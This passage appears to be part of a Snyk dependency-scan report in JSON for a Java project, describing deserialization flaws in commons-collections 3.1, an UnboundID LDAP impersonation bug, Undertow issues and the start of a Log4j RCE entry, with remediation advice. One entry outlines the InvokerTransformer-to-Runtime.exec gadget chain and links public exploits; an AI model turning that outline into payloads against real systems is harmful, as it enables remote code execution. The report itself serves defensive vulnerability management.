+ "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/pull/18",
+ "title": "GitHub PR"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Ticket"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 5.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:03:34.698666Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n",
+ "epssDetails": {
+ "percentile": "0.82742",
+ "probability": "0.00880",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-6420"
+ ],
+ "CWE": [
+ "CWE-502"
+ ],
+ "GHSA": [
+ "GHSA-6hgm-866r-3cjv"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2019-10-10T18:31:03.943542Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2019-10-10T00:00:00Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2020-02-24T00:00:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:35.761152Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMUNBOUNDID-32143",
+ "title": "User Impersonation",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,4.0.5)"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [
+ "4.0.5"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java",
+ "className": "SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "com.unboundid:unboundid-ldapsdk",
+ "references": [
+ {
+ "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134",
+ "title": "NVD"
+ },
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531",
+ "title": "RedHat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 7,
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:02:05.592817Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)",
+ "epssDetails": {
+ "percentile": "0.80961",
+ "probability": "0.00729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2018-1000134"
+ ],
+ "CWE": [
+ "CWE-284"
+ ]
+ },
+ "packageName": "com.unboundid:unboundid-ldapsdk",
+ "proprietary": false,
+ "creationTime": "2018-03-16T00:00:00Z",
+ "functions_new": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "className": "com.unboundid.ldap.sdk.SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2018-03-16T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "com.unboundid",
+ "artifactId": "unboundid-ldapsdk"
+ },
+ "publicationTime": "2018-04-01T14:18:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:49:40.956024Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "upgradePath": [
+ false,
+ "com.unboundid:unboundid-ldapsdk@4.0.5"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "com.unboundid:unboundid-ldapsdk",
+ "version": "3.1.1"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "low",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
+ "title": "Remote Code Execution (RCE)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.2)",
+ "[2.13.0,2.16.0)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.2",
+ "2.16.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f",
+ "title": "Apache Pony Mail"
+ },
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://twitter.com/marcioalm/status/1471740771581652995",
+ "title": "Twitter Post"
+ },
+ {
+ "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml",
+ "title": "Nuclei Templates"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
